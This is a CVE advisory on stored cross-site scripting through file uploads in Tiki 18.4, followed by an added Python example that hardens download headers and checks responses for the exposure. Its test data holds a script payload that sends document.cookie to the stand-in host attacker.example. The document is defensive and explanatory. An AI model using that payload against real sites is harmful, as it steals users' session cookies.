CVE-2019-15314

Aug 22nd, 2019
CVE-2019-15314

> [Description]
> tiki/tiki-upload_file.php in Tiki 18.4 allows remote attackers to
> upload JavaScript code that is executed upon visiting a
> tiki/tiki-download_file.php?display&fileId= URI.
>
> ------------------------------------------
>
> [Additional Information]
> File upload and JavaScript code injection.
> http://127.0.0.1/tiki/tiki-upload_file.php
>
> The TikiWiki CMS application allows you to upload a JavaScript file in the "File Upload" module.
> When viewing the uploaded file, the JavaScript code runs in the client browser.
>
> The injected JavaScript code is stored by the application and executed every time someone views it.
> ["Browser display (Raw / Download)"]
> http://127.0.0.1/tiki/tiki-download_file.php?fileId=17&display
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://tiki.org/HomePage
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Tiki Wiki CMS - 18.4
>
> ------------------------------------------
>
> [Affected Component]
> Affected component: tiki-upload_file.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Client side JavaScript code injection.
>
> ------------------------------------------
>
> [Reference]
> https://tiki.org/HomePage

Use CVE-2019-15314.
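The weakness described above is generic to any download endpoint: a stored user upload is returned inline (the "display" mode) with a type the browser will render as HTML, so script inside the file runs in the site's own origin. The block below is an added example, not Tiki's code and not part of the original advisory. It shows the policy a download handler needs to close that gap (type the file from its bytes rather than the client's claim, send only a short allowlist of passive types inline, add headers that forbid sniffing and script execution) and a checker that applies the advisory's condition to a captured response. All function names, the header policy, the sample file contents and the sample response headers are our own constructions.

```python
"""Added example (not Tiki's code): deciding whether a user upload may be
served inline, plus a checker for the exposure the advisory describes.
Sample files and response headers below are constructed test data."""
import re

# Passive types a browser displays without executing anything. SVG is excluded
# on purpose: it can carry <script> and inline event handlers.
INLINE_SAFE = {"image/png", "image/jpeg", "image/gif", "text/plain", "application/pdf"}

# Types that run script when a browser navigates to them directly.
EXECUTABLE_ON_NAVIGATION = {"text/html", "application/xhtml+xml", "image/svg+xml"}

_MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"%PDF-", "application/pdf"),
]

# Markup a browser could treat as active content if the type were ever sniffed or
# mislabelled. A false positive only forces a download, which is the safe way to fail.
_ACTIVE = re.compile(
    rb"<\s*(script|svg|html|body|iframe|object|embed|meta)\b|javascript:|\bon\w+\s*=", re.I
)

# Constructed test data: the kind of file the advisory describes, and a harmless image.
HTML_PAYLOAD = (b"<html><body><script>document.location='//attacker.example/?c='"
                b"+document.cookie</script></body></html>")
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

# Constructed headers modelling the weak "display" behaviour: inline HTML, no hardening.
VULNERABLE_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Disposition": 'inline; filename="note.html"',
}


def sniff_type(data: bytes, claimed: str) -> str:
    """Content type derived from the bytes of DATA. The client's CLAIMED type is
    honoured only for plain text that contains no active markup."""
    for magic, mime in _MAGIC:
        if data.startswith(magic):
            return mime
    if _ACTIVE.search(data[:4096]):
        return "application/octet-stream"
    if claimed.split(";")[0].strip().lower() == "text/plain" and b"\x00" not in data:
        return "text/plain"
    return "application/octet-stream"


def serve_upload(data: bytes, claimed_type: str, filename: str, display: bool) -> dict:
    """Response headers for an uploaded file. DISPLAY mirrors a ?display request
    parameter and is honoured only for passive types."""
    mime = sniff_type(data, claimed_type)
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)[:100] or "download"
    disposition = "inline" if display and mime in INLINE_SAFE else "attachment"
    return {
        "Content-Type": mime,
        "Content-Disposition": f'{disposition}; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",                       # no re-guessing of the type
        "Content-Security-Policy": "sandbox; default-src 'none'",  # opaque origin, no script
        "Content-Length": str(len(data)),
    }


def inline_script_exposure(headers: dict) -> bool:
    """Checker for a captured response: True if a browser navigating to it may
    run script from the body in the serving site's origin."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    disposition = h.get("content-disposition", "inline").split(";")[0].strip().lower()
    csp = h.get("content-security-policy", "").lower()
    sniffable = ctype == "" and h.get("x-content-type-options", "").lower() != "nosniff"
    executable = ctype in EXECUTABLE_ON_NAVIGATION or sniffable
    return disposition == "inline" and executable and "sandbox" not in csp


if __name__ == "__main__":
    print("weak response exposed:", inline_script_exposure(VULNERABLE_RESPONSE))
    hardened = serve_upload(HTML_PAYLOAD, "text/html", "note.html", display=True)
    print("hardened response exposed:", inline_script_exposure(hardened), hardened)
```

To use the checker against a live instance, fetch the download URL with a client of your choice and pass its response headers to `inline_script_exposure`; a `True` verdict means the endpoint renders uploads in the site's origin, which is the condition this CVE reports. Serving uploads from a separate origin is the stronger fix; the header policy in `serve_upload` is the minimum when that is not possible.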